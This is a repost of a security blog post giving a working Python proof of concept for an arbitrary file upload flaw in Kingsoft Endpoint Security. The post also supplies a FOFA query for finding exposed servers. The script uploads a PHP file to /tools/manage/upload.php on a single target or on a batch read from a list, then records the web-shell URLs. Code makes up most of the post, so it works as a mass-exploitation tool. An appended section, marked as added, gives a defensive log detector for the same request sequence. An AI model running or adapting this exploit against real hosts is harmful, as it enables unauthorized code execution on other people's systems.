Kingsoft Endpoint Security System arbitrary file upload vulnerability, with PoC – Author: 阿刁123456


FOFA site: fofa.so

FOFA search: title="金山终端安全"


Open any one of the results; the service is on port 6868.

The PoC confirms the vulnerability: the upload succeeds.


Python script:

import requests

headers = {
"Content-Type":"multipart/form-data;boundary=----WebKitFormBoundaryhQcaKJIKAnejKGru"
}

payload = '''------WebKitFormBoundaryhQcaKJIKAnejKGru
Content-Disposition: form-data; name="file";filename="21232f297a57a5a743894a0e4a801f13.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundaryhQcaKJIKAnejKGru--'''


def multi():
    # Batch mode: reads one ip:port per line from ips.txt
    f = open("ips.txt", "r")
    path = "/tools/manage/upload.php"
    for ip in f.readlines():
        ip = ip.replace("\n", "")
        url = "http://{}{}".format(ip, path)
        # Results file; the name means "vulnerable.txt"
        f_exist = open("存在漏洞.txt", "a+")
        # print(url)
        try:
            res = requests.post(url=url, data=payload, headers=headers)
            # print(res.text)
            if res.text.find("File is valid, and was successfully uploaded") != -1:
                # print("upload success")
                file = "http://{}/Uploaddir/21232f297a57a5a743894a0e4a801f13.php".format(ip)
                print(file)
                f_exist.writelines(file)
                f_exist.writelines("\n")
            else:
                print("不存在此漏洞")  # "not vulnerable"
            f_exist.close()
        except Exception as e:
            print("请求异常-------", e.args)  # "request error"


def single():
    # Single-target mode; the results file name means "vulnerable.txt"
    f_exist = open("存在漏洞.txt", "w+")
    path = "/tools/manage/upload.php"
    ip = input("目标ip = ")  # prompt: "target ip = "
    ip = ip.replace(" ","")
    url = "http://{}{}".format(ip, path)
    # print(url)
    try:
        res = requests.post(url=url, data=payload, headers=headers)
        # print(res.text)
        if res.text.find("File is valid, and was successfully uploaded") != -1:
            # print("upload success")
            # Message prefix means "vulnerable, shell:"
            file = "存在漏洞,shell:http://{}/Uploaddir/21232f297a57a5a743894a0e4a801f13.php".format(ip)
            print(file)
            f_exist.writelines(file)
            f_exist.writelines("\n")
        else:
            print("不存在此漏洞")  # "not vulnerable"
        f_exist.close()
    except Exception as e:
        print("请求异常-------",e.args)  # "request error"


if __name__ == '__main__':
    # Menu text, in English: "Enter the matching number:
    # 1. verify a single URL
    # 2. batch verification from a text file (ips.txt, one ip:port per line)"
    info = '''
****************************************
****************************************
****************************************
***请输入对应数字:                   ***
***1.针对单个url验证                  ***
***2.批量文本验证(ips.txt  每行eg:ip:port)
****************************************
****************************************
****************************************

'''
    select = input(info)

    if 1==int(select):
        while(1):
            single()
    elif  2==int(select):
        multi()
    else:
        print("选项异常 ",select)  # "invalid option"

The script supports verifying a single IP as well as batch scanning:


Do not use this for illegal purposes.
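
Added example, not part of the original post: a log check a defender could run to spot the request sequence this PoC produces, a successful POST to /tools/manage/upload.php followed by a request for a script file under /Uploaddir/. It assumes an Apache/nginx "combined" access log; the function name, the extension list and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the PoC on this page, lowercased for comparison.
UPLOAD_PATH = "/tools/manage/upload.php"
UPLOAD_DIR = "/uploaddir/"
# Assumed list of extensions a PHP handler may execute; match it to the server config.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

# Assumption: access log in Apache/nginx "combined" format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_abuse(lines):
    """Return (kind, client_ip, timestamp, uri) tuples for suspicious requests."""
    uploaders = set()   # clients that already got a 2xx from the upload endpoint
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not m["status"].startswith("2"):
            continue    # unparsable line or request that did not succeed
        path = unquote(m["uri"].split("?", 1)[0]).lower()
        if m["method"] == "POST" and path == UPLOAD_PATH:
            uploaders.add(m["ip"])
            findings.append(("upload", m["ip"], m["ts"], m["uri"]))
        elif path.startswith(UPLOAD_DIR) and path.endswith(SCRIPT_EXT):
            # A script served from the upload directory is never expected;
            # the same client uploading first matches the sequence in the PoC.
            kind = "script_after_upload" if m["ip"] in uploaders else "script_in_uploaddir"
            findings.append((kind, m["ip"], m["ts"], m["uri"]))
    return findings

# Constructed sample lines (documentation IP ranges), not taken from a real system.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2021:09:01:02 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [10/Apr/2021:09:02:10 +0800] "POST /tools/manage/upload.php HTTP/1.1" 200 61 "-" "-"',
    '203.0.113.9 - - [10/Apr/2021:09:02:11 +0800] "GET /Uploaddir/sample.php HTTP/1.1" 200 9021 "-" "-"',
    '198.51.100.7 - - [10/Apr/2021:09:05:00 +0800] "GET /Uploaddir/logo.png HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.44 - - [10/Apr/2021:09:06:00 +0800] "POST /tools/manage/upload.php HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.44 - - [10/Apr/2021:09:07:00 +0800] "GET /Uploaddir/x.PHP?a=1 HTTP/1.1" 200 10 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding)
```

Any `script_after_upload` or `script_in_uploaddir` hit warrants inspecting the files in the upload directory, which should hold no server-side scripts at all.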

Source: freebuf.com 2021-04-10 09:15:50 by: 阿刁123456
